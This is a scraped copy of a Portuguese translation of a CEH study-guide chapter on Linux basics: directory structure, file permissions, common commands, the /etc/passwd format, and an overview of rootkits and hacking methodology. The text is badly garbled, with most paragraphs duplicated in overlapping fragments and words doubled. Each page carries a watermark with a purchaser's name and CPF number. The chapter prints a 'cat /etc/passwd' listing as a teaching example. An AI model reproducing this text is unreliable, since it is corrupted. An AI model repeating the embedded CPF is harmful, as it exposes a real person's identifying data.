0% acharam este documento útil (0 voto)
20 visualizações70 páginas

Comandos e Estruturas do Linux

Este capítulo discute ferramentas de avaliação de segurança automatizadas para Linux, incluindo a estrutura de arquivos e diretórios comuns, comandos básicos e identificação de usuários. Também aborda rootkits, hacks em Linux e como o sistema operacional pode ser mais seguro.

Enviado por

OSCP 2022
Direitos autorais
© All Rights Reserved
Levamos muito a sério os direitos de conteúdo. Se você suspeita que este conteúdo é seu, reivindique-o aqui.
Formatos disponíveis
Baixe no formato PDF, TXT ou leia on-line no Scribd
0% acharam este documento útil (0 voto)
20 visualizações70 páginas

Comandos e Estruturas do Linux

Este capítulo discute ferramentas de avaliação de segurança automatizadas para Linux, incluindo a estrutura de arquivos e diretórios comuns, comandos básicos e identificação de usuários. Também aborda rootkits, hacks em Linux e como o sistema operacional pode ser mais seguro.

Enviado por

OSCP 2022
Direitos autorais
© All Rights Reserved
Levamos muito a sério os direitos de conteúdo. Se você suspeita que este conteúdo é seu, reivindique-o aqui.
Formatos disponíveis
Baixe no formato PDF, TXT ou leia on-line no Scribd

Impresso por Evanildo Conceiçao, CPF 030.567.395-51 para uso pessoal e privado.

Este material pode ser protegido por direitos


autorais e não pode ser reproduzido ou repassado para terceiros. 26/03/2021 19:14:24

Tradução: Roque Cerávolo


Cerávolo Capítulo 5

Capítulo 5. Linux
Linux e ferramentas de avaliação automática Segurança.
automática de Segurança

Este capítulo ajuda a preparar para o Certificado Hacker


Hacker Ético do Exame CE-Conselho
CE -Conselho
(CEH)., abrangendo as seguintes
seguintes objetivos do CE-Conselho
CE -Conselho que incluem a compreensão dos
aspectos do negócio de testes de penetração. Isso inclui itens como:

Identificar a estrutura de arquivos do Linux e diretórios


diretórios comuns.

 Capítulo
Tudo no Linux é um arquivo. Esses arquivos são5organizados em um sistema de pastas e
diretórios. Diretórios
Tradução: Roque Cerávolo comuns em Linux incluem etc. A pasta contém configurações
específicas de acolhimento e os arquivos passwd e shadow.

Entenda comandos básicos do Linux.


Capítulo 5. Linux e ferramentas de avaliação automática de Segurança.

 Comandos básicos
Este capítulo ajuda do Linux incluem
a preparar ls, cat, moreHac
para o Certificado , cdker
, e vi.
Ético do Exame CE -Conselho
 (CEH)., abrangendo as seguintes objetivos do CE -Conselho que incluem a compreensão dos
Identificar
aspectos do anegócio
estrutura de arquivos
de testes do Linux
de penetração. Issoe diretór ios comuns.
inclui itens como:
Identificar o usuário root e saber as IDs de usuário e de grupo.

 Acesso para usuários e processos do sistema é atribuído um ID de usuário (UID) e


um ID de grupo (GID). Root (Raiz) tem um UID de 0 e um GUID de 0.
Tudo no Linux é um arquivo. Esses arquivos são organizados em um sistema de pastas e
diretórios. Diretórios
Descreva comocomuns em Linux
programas incluem
Linux etc. A pasta carregados,
são compilados, contém configurações
comprimidos.
e comprimidos.
 Entenda comandos
específicas básicos
de acolhimento e do Linux.
os arquivos passwd e shadow.
 Compilando no Linux geralmente requer três etapas.

hackeado.
Identificar como o Linux é hackeado.

Comandos básicos do Linux incluem ls, cat, more, cd, e vi.
Identificar o usuário root e saber as IDs de usuário e de grupo.

1
 Acesso para usuários e processos do sistema é atribuído um ID de usuário (UID) e
Descreva como (GID).
um ID de grupo programas
Root Linux
(Raiz) são
temcompilados,
um UID de 0carregados,
e um GUID edecomprimidos
0.

Identificar como
Compilando o Linux
no Linux é hackeado
geralmente requer três etapas.
Impresso por Evanildo Conceiçao, CPF 030.567.395-51 para uso pessoal e privado. Este material pode ser protegido por direitos
autorais e não pode ser reproduzido ou repassado para terceiros. 26/03/2021 19:14:24

 Linux é hackeado, seguindo a mesma metodologia básica como Windows, que é:


Reconhecimento, varredura e enumeração,
enumeração, o acesso, a esca
escalada
lada de privilégios,
mantendo o acesso, e cobrindo faixas e colocação de backdoors.
backdoors.

Descrever
Descrev seguro.
er como o Linux é seguro.

 Linux é seguro por praticar defesa em profundidade. Isto significa garantir


 fisicamente e logicamente, aplicação de patches, desligando serviços não utilizados,
endurecimentos, e aplicações de outras medidas de defesas.

Explicar rootkits e contramedidas.

 Linux é hackeado,
Os rootkits são um seguindo
conjunto ademesma metodologia
ferramentas básica como
que permitem Windows,
que um que é: um
hacker possua
Reconhecimento, varredura e enumeração, o acesso, a escalada de privilégios,
 sistema.
Descrev Eles
er normalmente éoferecem um acesso backdoor, coletam informações
mantendo ocomo o Linux
acesso, seguro
e cobrindo faixas e colocação de backdoors.
sobre outros sistemas na rede, permitim a operação de processos ocultos, e muito
mais.
.
automatizados.
Discutir os diferentes tipos de instrumentos de avaliação automatizados.
Linux é seguro por praticar defesa em profundidade. Isto significa garantir
fisicamente e logicamente, aplicação de patches, desligando serviços não utilizados,
 Estas ferramentas
Explicar rootkits podem escanear um grande número de sistemas e permitem que
eaplicações
contramedidas.
endurecimentos,
hackers éticos se econcentram de outras
em medidas
áreas-chave. de defesas.
Estas ferramentas variam de freeware
a comercial.

estudo.
Estratégias de estudo.
Os rootkits são um conjunto de ferramentas que permitem que um hacker possua um
sistema. Eles normalmente oferecem um acesso backdoor, coletam informações
sobreaborda
Estecapítulo
outrosassistemas na rede,
as informações que
permitim a operação deas processos ocultos, e muito
Discutir
mais. os diferentes tipos devocê precisa saberdesobre
instrumentos as ferramentas
ferramenta
avaliação s de avaliação
automatizados
Linux e automatização.
automatização. Para ganhar uma compreensão
compreensão mais profunda
profunda dos temas:
.

 Carregar o Linux e se familiarizar


familiarizar com a estrutura do arquivo.
arquivo.
Estas ferramentas podem escanear um grande número de sistemas e permitem que
 Praticar
Estratégias hackers
o uso de éticos
de estudo se concentram
ferramentas
ferramentas como Johnem
como theáreas-chave.
Ripper. Estas ferramentas variam de freeware
a comercial.
.
 Compreender os caminhos que o Linux é hackeado.
hackeado.

 Especificar as fformas
ormas que o Linux pode ser seguro.
seguro.
Este capítulo aborda as informações que você precisa saber sobre as ferramentas de avaliação
 Linux e automatizaç
Descrever ão. Para ganhar
pormenorizadamente
pormenorizadamente uma compreensão
a estrutura do arquivomais profunda dos temas:
passwd.

 Entender os diferentes
diferentes tipos de instrumentos
instrumentos de avaliação
avaliação e saber a diferença entre os scanners de
código fonte da aplicação,
aplicação, scanners, monitores
monitores e scanners de nível
nível de sistema.
 Carregar o Linux e se familiarizar com a estrutura do arquivo.
 Descrever como
como automatizar exploração
exploração usando toolssuch como Metasploit
Metasploit e Impacto Core.
Core.
 Praticar o uso de ferramentas como John the Ripper.
Introduçãoos caminhos que o Linux é hackeado.
 Compreender
Este capítulo apresenta
apresenta o Linux. Linux é usado para alimentar muitos
muitos dos servidores encontrados
encontrados ao redor
 Especificar as formas que o Linux pode ser seguro.
2
Descrever pormenorizadamente a estrutura do arquivo passwd.

Entender os diferentes tipos de instrumentos de avaliação e saber a diferença entre os scanners de
código fonte da aplicação, scanners, monitores e scanners de nível de sistema.

Descrever como automatizar exploração usando toolssuch como Metasploit e Impacto Core.
Impresso por Evanildo Conceiçao, CPF 030.567.395-51 para uso pessoal e privado. Este material pode ser protegido por direitos
autorais e não pode ser reproduzido ou repassado para terceiros. 26/03/2021 19:14:24

do mundo. É um sistema
sistema operacional robusto
robusto e completo. Ele é o favorito de
de um hacker, porque é fácil para
desenvolver programas,
programas, e é uma grande
grande plataforma para construir
construir e testar ferramentas
ferramentas de segurança.
segurança. Nós
olhamos para o Linux básico,
básico, como as senhas
senhas são armazenadas, e o formato que eles são armazenados
armazenados
Hacking dentro do Linux
Linux também é discutido,
discutido, e você começará a ver que, embora as ferramentas
ferramentas de
hacking podem mudar, todo
todo o processo é o mesmo que a pirataria
pirataria do Windows.

A segunda metade do capítulo olha para ferramentas ferramentas de avaliação automatizadas.


automatizadas. Se você ainda tem tem de
realizar quaisquer avaliações
avaliações de segurança ou testes de penetração, penetração, você vai descobrir
descobrir o quão importante
essas ferramentas podem ser. Com limitados recursos recursos humanos e de tempo, tempo, ferramentas de segurança
segurança
automatizadas podempodem ser uma grande ajuda no no preenchimento
preenchimento de lacunas. Ferramentas de avaliação avaliação
do mundo. É umpodem
automatizadas siste
pode mmaseroperacional
usadas pararobust o e completo
escanear
escanear códigos, .aplicativos
Ele é o os
aplicativ favorito
ou redesde um hacker,
inteiras, porque
depend
dependendo é fácil
endo para
do seu
desenvolver
design. programas,
Algumas das maise populares
é uma grand e plataforma
ferramentas de para construir
avaliação e testar os
automatizad
automatizados ferra mentas
incluem de seguranR,ça.
FLAWFINDE
FLAWFINDER, o Nós
olhamosSaint,
Nessus, para oe Linux básico,Cada
Metasploit.
Metasploit. como as senh
uma delasasésão armazenadas,
examinada
examinada e o formato que eles são armazenados
neste capítulo.
Hacking dentro do Linux também é discutido, e você começará a ver que, embora as ferramentas de
hacking Linux
podem mudar, todo o processo é o mesmo que a pirataria do Windows.
Linux é um sistema operacional baseado em UNIX. O Linux foi originalmente originalmente criado por Linus Torvalds Torvalds com
aA ajuda
segundade pr ogramadores
metade de todo
do capítulo olhaopara
mundo . Se
ferra você édenovo
você
mentas no Linux,
avaliação isso deve
deve servir
automatizadas. comoainda
Se você umatem de
uma
oportunidade paraaconhecer
realizar quaisquer cvaliações
onhecer odesistema operaci
operacional
segurança onal (OS)
ou testes um pouco
de penetra ção,melhor.
você vaiOsdebenefícios de usar
scobrir o quão Linux é
Linux
importante
que ele é econô
econômico,
mico, bem concebido, e oferec
oferece e bom dese
desempenho.
mpenho. Distribuições
essas ferramentas podem ser. Com limitados recursos humanos e de tempo, ferramentas de segurança Linux são facil
facilmente
mente
disponíveis
automatizadas e podem
pode
podemm ser baixados
ser para ajuda
uma grande qualquer
qualquer sistema. Linuxovem
no preenchiment em diversos
de lacunas. sabores, de
sabores,
Ferramentas incluindo
avaliação Red
Hat, Debian, Mandra
Mandrake, ke, SUSE, e assim por diant
diante e . Algumas versõe
versões s especializadas
automatizadas podem ser usadas para escanear códigos, aplicativos ou redes inteiras, dependendo do seu de Linux tê
têm
m sido
design. Algumas
desenvolvidos dasum
para mais populares
propósito
propósito ferramentas
específico. Algumas
Algumasde avaliação automatizad
delas incluem
inclue m Knoppix, os Trinux,
incluemAuditor,
FLAWFINDE R, opor
e assim
assim
diante.
Nessus,ASaint,
melhor mansploit.
maneira
e Meta eira deCada
aprender Linux éé eapenas
uma delas xaminada usando-
[Link]ítulo.
É por isso que uma cópia cópia do Linux está
incluído no CD. Você pode usar os arquivos de instalação instalação do Linux no CD para carregar o Linux em um disco
rígido do sistema ou fazer um CD, para obter obter mais informações, confira o Apêndice B, "Preparando "Preparando o
Linux
Linux é um
sistema sistema
para operacional
o Knoppix-STD".
Knoppix-ST D". Sebaseado
você estáem UNIX.
à procura
pr ocura O de
Linux foi originalm
outras versões do dente criado
o Linux quepor Linus
foram perTor valds com
personalizados
sonalizados
a ajuda
para de programadores
o trabalho segurande
de segurança ça etodo o mundo
testes . Se ação,
de penetração,
penetr você éverifique
novo noaLinux,
lista deisso deve servir
conteúdo em como uma
oportunidade para cm/content/[Link]
onhecer o sistema operaci
[Link]/content/[Link]
[Link] m/content/[Link] p.. onal (OS) um pouco melhor. Os benefícios de usar Linux é
que ele é econômico, bem concebido, e oferece bom desempenho. Distribuições Linux são facilmente
disponíveis
Linux e podeaberto,
é de código merto,
ab ser baixados para qualq
o que significa que uer sistema.
ele pode ser Linux vem em
distribuído gradiversos
gratuitamentesabore
tuitamente s, incluindo
e você Redo de
tem o direito
direit
Hat, Debian,
modificar Mandraonte.
ke, SUSE,
o código-fonte.
código-f Linuxetambém
assim por diant
é fácil
fá e. Algumas
cil de desenvolver versõe
seus s especializadas de Linux
próprios programas
programas têm
. Esta sido das
é uma
desenvolvidos
razões que você para
vai um
ver pr
ver opósito
muitas específico.
ferra
ferramentas
mentas de Algsegurança
umas nça
segura delas incluemno
liberadas Knoppix,
Linux bemTrinux,
antesAuditor,
mesmoe de
mesmo assim por
fazer
diante. A melhor man eira de aprender Linux é apenas usando- o. É por
uma estréia no mundo Windows. Esta seção do Capítulo dá uma olhada no Linux, analisa alguns isso que uma cópia do Linux
alguns dos está
incluído nobásicos,
princípios CD. Vocêolhapode
parusar
para os arquivos
a algumas de instalação
ferramentas
ferramentas do eLinux
do Linux, discuteno CDcomo para carregar
o Linux o Linux
é usado
usad o porem um disco
hackers,
rígido do sistema
bem como a forma ou fazer um CD,
forma como ele é hackeado. para obte r mais informações, confira o Apêndice B, "Prepar ando o
sistema para o Knoppix-STD". Se você está à procura de outras versões do Linux que foram personalizados
Estrutura
para o trabalho do arquivo
de seguran arquivo
ça e testesLinux
de penetração, verifique a lista de conteúdo em
[Link]/content/[Link]..
Objetivo:
Linux é de código aberto, o que significa que ele pode ser distribuído gratuitamente e você tem o direito de
modificar
Identificaroacódigo-f onte.
estrutura Linux também
de arquivos
de Linuéxfáecil
do Linux de desenvolver
diretórios [Link] próprios programas. Esta é uma das
razões que você vai ver muitas ferramentas de segurança liberadas no Linux bem antes mesmo de fazer
uma estréia no mundo Windows. Esta seção do Capítulo dá uma olhada no Linux, analisa alguns dos
princípios básicos, olha para algumas ferramentas do Linux, e discute como o Linux é usado por hackers,
bem como O sistema
a formade arquiv
arquivos
como eleosé Linux é a estrutura em
hackeado. em que todas as informações
informações no computador são
armazenados. Os arquivos
arquivos são armazenados
armazenados dentro de uma hierarquia de diretórios.
diretórios. Cada diretório
diretório pode

Estrutura do arquivo Linux


Objetivo: 3

Identificar a estrutura de arquivos do Linux e diretórios comuns.


Impresso por Evanildo Conceiçao, CPF 030.567.395-51 para uso pessoal e privado. Este material pode ser protegido por direitos
autorais e não pode ser reproduzido ou repassado para terceiros. 26/03/2021 19:14:24

conter outros diretórios


diretórios e arquivos. Diretórios
Diretórios comuns no sistema
sistema de arquivos Linux podem ser
ser vistos na
Figura 5.1.

conter outros diretórios e arquivos. Diretórios comuns no sistema de arquivos Linux podem ser vistos na
Figura 5.1.

Barras são usadas para separar


separar nomes de diretórios
diretórios em Linux. Unidades
Unidades físicas são tratadas de
maneira diferente
diferente do que o DOS. O diretório
diretório / usr poderia estar em um
um disco rígido separado, ou / mnt
pode conter uma pasta chamada / armazenamento
armazenamento que é na verdade
verdade uma unidade de outro
outro computador.

Alguns dos diretórios


diretórios mais comuns encontrados
encontrados em um sistema Linux
Linux são descritos aqui:

/ Representa o diretório
diretório raiz.

/ bin Contém comandos comuns de usuários Linux, como


como ls, data de classificação,
classificação, e chmod.

Barrasarquivos
/ dev Contém são usadas
arquivos quepara separar nomes
representam de dire
os pontos
os detórios
acessoem Linux. Unidad
a dispositivos
dispositivos esseus
em físicas
seu são tratadas
s sistemas. Estes de
podem
maneira
incluir diferentediscos
disquetes, do que o DOSe. CD
rígidos O diretóri
-ROMs.o / usr poderia estar em um disco rígido separado, ou / mnt
pode conter uma pasta chamada / armazenamento que é na verdade uma unidade de outro computador.
/ etc Contém arquivos de de configuração administrativa,
administrativa, o arquivo
arquivo passwd, e o arquivo
arquivo de sombra (shadow).
Alguns dos diretórios mais comuns encontrados em um sistema Linux são descritos aqui:
/ home Contém os diretórios
diretórios home dos usuários.
/ Representa o diretório raiz.
/ mnt Fornece um local
local para dispositivos de montagem, tais como CD-R -ROMs
OMs e disquetes.
/ bin Contém comandos comuns de usuários Linux, como ls, data de classificação, e chmod.
/ sbin Contém comandos administrativos e processos
processos daemon.
/ dev Contém arquivos que representam os pontos de acesso a dispositivos em seus sistemas. Estes podem
incluir disquetes, discos rígidos e CD-ROMs. 4

/ etc Contém arquivos de configuração administrativa, o arquivo passwd, e o arquivo de sombra (shadow).

/ home Contém os diretórios home dos usuários.


Impresso por Evanildo Conceiçao, CPF 030.567.395-51 para uso pessoal e privado. Este material pode ser protegido por direitos
autorais e não pode ser reproduzido ou repassado para terceiros. 26/03/2021 19:14:24

/ usr Contém documentação


documentação do utilizador, os ficheiros gráficos, bibliotecas, assim
assim como uma variedade de
de
outros utilizadores e comandos
comandos administrativos
administrativos e arquivos.

Alerta de exame

Certifique-se de que você sabe e entender


entender a estrutura básica de arquivos
arquivos Linux.

Diretórios e arquivos
arquivos em um sistema Linux são configurados
configurados para que o acesso
acesso possa ser controlado.
Quando
/ usr Contém documentação do utilizador, os ficheiros gráficos, bibliotecas,usuário
você efetuar l
login
ogin no sistema, será identifi
identificado
cado por uma c
conta
onta de . Alémuma
assim como de sua conta de
variedadedede
usuário, você pode epertencer
outros utilizadores per tencer a um
comandos grupo
adminis ou grupos.
grup
trativos e os. Portanto, os arquivos
arquivos. arquivos podem ter permissões
permissões de
conjunto para um usuário,
usuário, um grupo, ou outros.
outros. Por exemplo, o Linux Red
Red Hat suporta três grupos
grupos padrões:
padrões:
super usuários, usuários do sistema, e usuários
usuários normais. De acesso para cada um um destes grupos
grupos tem três
Certifique-se de que você sabe e entender a estrutura básica de arquivos Linux.
Alerta de exame
opções:

 Ler

 Escrever

Diretórios e arquivos em um sistema Linux são configurados para que o acesso possa ser controlado.
 Executar
Quando você efetuar login no sistema, será identificado por uma conta de usuário. Além de sua conta de
Para ver você
usuário, as permissões
permiss
pode ões atuais,aoum
pertencer proprietário
grupo ou egrup
de os.
grupo para um
Portanto, osarquivo
arquivo oupodem
arquivos diretório, digita oões
ter permiss comando
comando
de
ls-l
ls-l.
-l. Isto
conjunto irá
para um usuário, um grupo, ou outros. Por exemplo, o Linux Red Hat suporta três grupos todos
exibir o conteú
conteúdo do do diretório que você está com os privilégi
privilégios
os para o usuário, grupo e os:
padrões

outros. Por exempl
exemplo, o, a lista de um arquivo cha
chamado
mado demofile e o diretório demod
demodirir seria semelhante
super usuários, usuários do sistema, e usuários normais. De acesso para cada um destes grupos tem três ao
seguinte:
opções:

drwxr-xr
drwxr-
 xr
xr-x
-x 2 mikeg users 32768 Nov 20 00:31 demodir
Ler

-rw-r--r--Escrever
1 mikeg users 4108 Nov 16 11:21 demofile

Executar
As permissões são listados
listados na primeira coluna. A primeira letra é se o item item é um diretório ou um arquivo.
arquivo. Se
Para ver as permiss ões atuais, o proprietário
a primeira letra é d, o item é um diretório, como e de grupo para um arquiv
como no primeiro item listado o ou diretório, digita
listad anteriormente, dem o co
demodir mando
odir.
odir . Para o
ls-l. Isto irá
demofile exibir oaconteú
arquivo, primeira
primeiradoletra
do diretório que vocênove
é --.. Os próximos nestá
ove com os privilégi
caractere
caracteres os para
s denotam o usuário,
acessar e temgrupo e todos os
a seguinte
outros.
forma, rwxPor |exempl
rwx | o,rwx.
rwx.a lista
Listade
osumtrêsarquivo
primeiroschamado demofile
direitos e odo
de acesso ddiretório
o usuário,demod ir seria
portanto, semelhante
para demodir, oao
demodir,
seguinte:
usuário ler, escrever e executar privilégios. Os próximos três bits denotam denotam os dir direitos
eitos de grupo, portanto,
portanto, o
grupo ler e executar privilégios para a pasta demodir emodir.. Finalmente, os últimos
últimos três bits especificam
especificam o acesso
de todos os outros têmtêm para a pasta demodir. Nes Neste
te caso, eles têm
têm de ler e executar privilégios.
privilégios. A terceira
coluna, mikeg, especifica
especifica o proprietário do do arquivo / diretório,
diretório, e a quarta
quarta coluna, os usuários,
usuários, é o nome do
drwxr- xr -x 2 mikeg users
grupo para o arquivo / diretório 32768
diretório Nov 20 00:31 demodir
tório.. O único que pode modificar ou excluir qualquer arquivo neste diretório diretório é
o mikeg proprietário.
-rw-r--r-- 1 mikeg users 4108 Nov 16 11:21 demofile
As permissões são listados na primeira coluna. A primeira letra é se o item é um diretório ou um arquivo. Se
a primeira
O comandoletra é d,éousado
chmod itemoépor
usad umum diretório, como
proprietári
proprietário noarquivo
o do primeiroouitem listado anteriormente,
administrador
administrador para alterar dem
para odir. Para
a definição de o
demofile arquivo,
permissões de acesso a pri meira letra é - . Os
acesso a um arquivo ou conjunto próximos nove caractere
conjunto de arquivos. Chmod s denotam acessar
Chmod pode ser utilizada e tem a seguinte
utilizada nos modos
forma, rwxe| absoluto.
simbólicas rwx | [Link]
Lista ossimbólicas
três primeiros
com direitos
símbolosde
símbolos acesso
como doenquanto
rwx, usuário,
enq uanto portanto, para demodir,
ofertas absolutos com valores
com o
usuário
octais.
octais ler, escrever
. Para cada um edos executar privilégios.
três conjuntos
conjun Os próximos
tos de permissão detrês
um bits denotam
FILEREAD, os direitos
escrever de grupo,
Read portant
e executeRead
execute o, o
é atribuído
grupo
o ler e4,executar
número privilégios
de escrita é atribuído
atribuídpara a pasta d2,
o o número emodir
exec. utar
Finalmente,
e executar os últi
é atribuído mos trê[Link]
o número especifica
Para mse
certificar- o acesso
de que
de todos os outros têm para a pasta demodir. Neste caso, eles têm de ler e executar privilégios. A terceira
coluna, mikeg, especifica o proprietário do arquivo / diretório, e a quarta coluna, os usuários, é o nome do 5
grupo para o arquivo / diretório. O único que pode modificar ou excluir qualquer arquivo neste diretório é
o mikeg proprietário.

O comando chmod é usado por um proprietário do arquivo ou administrador para alterar a definição de
permissões de acesso a um arquivo ou conjunto de arquivos. Chmod pode ser utilizada nos modos
Impresso por Evanildo Conceiçao, CPF 030.567.395-51 para uso pessoal e privado. Este material pode ser protegido por direitos
autorais e não pode ser reproduzido ou repassado para terceiros. 26/03/2021 19:14:24

as permissões estão
estão bem abertos para si mesmo,
mesmo, o grupo e todos os usuários,
usuários, o comando seria chm
chmod
od 777
demofile.

Alerta de exame

Você precisa entender


entender o equivalente binário
binário de arquivo e as permissões
permissões de acesso à pasta
pasta. C omo um
exemplo, a representação
representação binária de rwxr - r - seria 744.

as permissões estão bem abertos para si mesmo, o grupo e todos os usuários, o comando seria chmod 777
Linux Básico
demofile.

Objetivo
Alerta de exame
Entender os comandos
comandos básicos do Linux
Linux
Você precisa entenoder
Identificar o equivalente
usuário binário
root e saber deIDarquivo
o sua e aseperm
de usuário issões de acesso à pasta. C omo um
grupo
exemplo, a representação binária de rwxr - r - seria 744.

O objetivo desta seção


seção é revisar alguns conceitos
conceitos básicos de Linux. Apesar de uma grande quantidade de
trabalho pode ser feito
feito a partir da GUI Linux, você ainda vai precisar
precisar de operar a partir da janela dede terminal
ou shell. A janela de terminal
terminal é semelhante
semelhante ao prompt de comando do Windows.
Windows. Se você entrar como
como root
Objetivo
e abrir uma janela
Linux de terminal, você deve
Básico deve ver algo semelhante
semelhante a isto: [root @ rh /] #.#. O sinal # é o mais
mais
importante aqui, pois denota
denota que você está como [Link]. Root é Deus no mundo
mundo do Linux. Isto significa que
que a
raiz tem controle total
total do sistema e mantém
mantém o mais alto nível
nível de privilégio. Você vai querer se certificar
certificar de
Entender os comandos básicos do Linux
que adequadamente
adequadamente executa comandos como root, enquanto trabalhava, trabalhava, porque ao contrário
contrário do
Identificar o usuário root e saber o sua ID de usuário e grupo
Windows, o Linux não não pode oferecer-lhe instruções
instruções ou avisos
avisos antes de executar um comando
comando crítico. É
importante que você
você saiba alguns comandos
comandos básicos do Linux e suas funções. Alguns
Alguns dos comandos básicos
básicos
são fornecidos na Tabela 5.1.
O objetivo desta seção é revisar alguns conceitos básicos de Linux. Apesar de uma grande quantidade de
Comando Descrição
trabalho pode ser feito a partir da GUI Linux, você ainda vai precisar de operar a partir da janela de terminal
cat Lista dedeconteúdo
ou shell. A janela terminal de um arquivo
um
é semelhan te ao prompt de comando do Windows. Se você entrar como root
Cd Mudança de Diretóri
Diretório o
e abrir uma janela de terminal, você deve ver algo semelhante a isto: [root @ rh /] #. O sinal # é o mais
chmod
importanteMudança
aqui, poisde arquivos
arquivos
denota queevocê
pastas direitos
está como eroot
propriedade
propriedade
. Root é Deus no mundo do Linux. Isto significa que a
cpraiz tem controle
O comando de sistema
total do cópia e mantém o mais alto nível de privilégio. Você vai querer se certificar de
history Mostra te
que adequadamen o histórico
históric
executao comandos
de até 500 como
comando
comandos s enquanto trabalhava, porque ao contrário do
root,
ifconfig
Windows, oSemelhante ao ifconfig
Linux não pode ifcoferecer-lhe
onfig do ipconfig
instruno
çõesWin
Windows
oudows
avisos antes de executar um comando crítico. É
kill Matar um processo em execução, especifi
especificando
importante que você saiba alguns comandos básicos do Linux cando o PID
PI
e Dsuas funções. Alguns dos comandos básicos
lssão fornecidos
Listana
o conteúdo
Tabela [Link] uma pasta
man Abre as páginas do do manual
Comando
mv Descrição
Para mover arquivos
arquivos e diretórios
cat
passwd Lista de conteúdo
Para alterar de um arquivo
sua senha
Cd Mudança de Diretório
ps Status do processo
processo
chmod Mudança de arquivos e pastas direitos e propriedade
pwd Imprime o caminho
caminho do diretório de trabalho
cp O comando de cópia
rm Remove um arquivo
arquivo
history Mostra o histórico de até 500 comandos
rm-r
rm -r Remove um diretório
diretório e todo o seu conteúdo
ifconfig Semelhante ao ifconfig do ipconfig no Windows
kill Matar um processo em execução, especificando o PID
ls Lista o conteúdo de uma pasta 6
man Abre as páginas do manual
mv Para mover arquivos e diretórios
passwd Para alterar sua senha
ps Status do processo
pwd Imprime o caminho do diretório de trabalho
Impresso por Evanildo Conceiçao, CPF 030.567.395-51 para uso pessoal e privado. Este material pode ser protegido por direitos
autorais e não pode ser reproduzido ou repassado para terceiros. 26/03/2021 19:14:24

Ctrl P Pausa um programa


programa
Ctrl B Coloca o programa atual para o fundo
fundo
Ctrl Z Coloca o programa atual para dormir

Assim como no mundo


mundo da Microsoft, usuários
usuários de Linux devem
devem ser geridos de uma
uma forma organizada.
organizada. Acesso
para usuários e processos
processos do sistema é atribuído um
um ID de usuário (UID) e um ID de grupo
grupo (GID). Os grupos
são agrupamentos
agrupamentos lógicos de usuários que têmtêm necessidades
necessidades semelhantes. Esta informação
informação está contida
contida no
arquivo / etc / passwd.
passwd. Como um hacker ético, é importante
importante que você compreenda
compreenda a impor
impor
ortância
tância deste
arquivo. Um exemplo
exemplo é mostrado aqui:
aqui:

[root@mg /root]# cat /etc/passwd


Ctrl P Pausa um programa
root:x:0:0:root:/root:/bin/bash
Ctrl B Coloca o programa atual para o fundo
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
Ctrl Z Coloca o programa atual para dormir
adm:x:3:4:adm:/var/adm:
lp:x:4:7:lp:/var/spool/lpd:
Assim como no mundo da Microsoft, usuários de Linux devem ser geridos de uma forma organizada. Acesso
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
para usuários e processos do sistema é atribuído um ID de usuário (UID) e um ID de grupo (GID). Os grupos
halt:x:7:0:halt:/sbin:/sbin/halt
são agrupamentos lógicos de usuários que têm necessidades semelhantes. Esta informação está contida no
mail:x:8:12:mail:/var/spool/mail:
arquivo / etc / passwd. Como um hacker ético, é importante que você compreenda a impor tância deste
news:x:9:13:news:/var/spool/news:
operator:x:11:0:operator:/root:
arquivo. Um/root]#
exemplo écat
mostrado aqui:
[root@mg /etc/passwd
gopher:x:13:30:gopher:/usr/lib/gopher-data:
root:x:0:0:root:/root:/bin/bash
ftp:x:14:50:FTP User:/home/ftp:
bin:x:1:1:bin:/bin:
xfs:x:43:43:X Font Server:/etc/X11/fs:/bin/false
daemon:x:2:2:daemon:/sbin:
named:x:25:25:Named:/var/named:/bin/false
adm:x:3:4:adm:/var/adm:
john:x:500:500:John:/home/jn:/bin/bash
lp:x:4:7:lp:/var/spool/lpd:
clement:x:501:501:Clement:/cd/:/bin/csh
sync:x:5:0:sync:/sbin:/bin/sync
betty:x:502:502:Betty:/home/bd:/bin/pop
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
mike:x:503:503:Mike:/home/mg:/bin/bash
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:
news:x:9:13:news:/var/spool/news:
operator:x:11:0:operator:/root:
Você vai notar que root é a primeira conta na lista. Root é sempre atribuído a 0 UID e 0 GID.
gopher:x:13:30:gopher:/usr/lib/gopher-data:
Outros usuários especiais
ftp:x:14:50:FTP e contas associadas a serviços e daemons são listados após root e têm
User:/home/ftp:
valores abaixo de Font
xfs:x:43:43:X 100. Red Hat começa com usuários regulares em um UID de 500. Vamos dar uma
Server:/etc/X11/fs:/bin/false
olhada em cada campo e discutir o seu significado. Olhe para a última listagem,
named:x:25:25:Named:/var/named:/bin/false listagem, que é o registro de
john:x:500:500:John:/home/jn:/bin/bash
Mike, e vamos analisar cada campo e seu significado. Os campos
campos são denotados por dois pontos.
clement:x:501:501:Clement:/cd/:/bin/csh
betty:x:502:502:Betty:/home/bd:/bin/pop
1- O nome de usuário é o primeiro campo. Maiúscula inicial não é usado para evitar confusão
mike:x:503:503:Mike:/home/mg:/bin/bash confusão
com superior/minúsculas.

2- segundo campo contém a senha criptografada. Você pode notar que o campo é marcadomarcado
por um x, neste caso, é porque esse sistema Linux em particular é o uso de senhas sombra,
que são realizadas no arquivo / etc / shadow. O arquivo shadow é usado
usado para aumentar a
segurança e está localizado em / etc / shadow. Senhas shadow são discutidos de forma mais
Você vai notar que root é a primeira conta na lista. Root é sempre atribuído a 0 UID e 0 GID.
completa,especiais
Outros usuários mais adiante neste
e contas capítulo. a serviços e daemons são listados após root e têm
associadas
valores abaixo de 100. Red Hat começa com usuários regulares em um UID de 500. Vamos dar uma
3- Ocada
olhada em terceiro
campo campo é o UID.
e discutir o seuUID Mike é 503.
significado. OlheQualquer arquivo
para a última Mike
listagem,possui
que é oouregistro
cria teráde
Mike, eeste
vamos analisar
número cada campo
associado a ele. e seu significado. Os campos são denotados por dois pontos.

1- O
4- nome de usuário
O quarto campo éé oo GID.
primeiro
GIDcampo.
Mike éMaiúscula
503. Vocêinicial nãoque
vai notar é usado
aG para
GIID evitar
e UID sãoconfusão
os
com superior/minúsculas.
mesmos, assim como a outros usuários listados no arquivo de senha mostrada anteriormente.

2- segundo campo contém a senha criptografada. Você pode notar que o campo é marcado 7
por um x, neste caso, é porque esse sistema Linux em particular é o uso de senhas sombra,
que são realizadas no arquivo / etc / shadow. O arquivo shadow é usado para aumentar a
segurança e está localizado em / etc / shadow. Senhas shadow são discutidos de forma mais
completa, mais adiante neste capítulo.
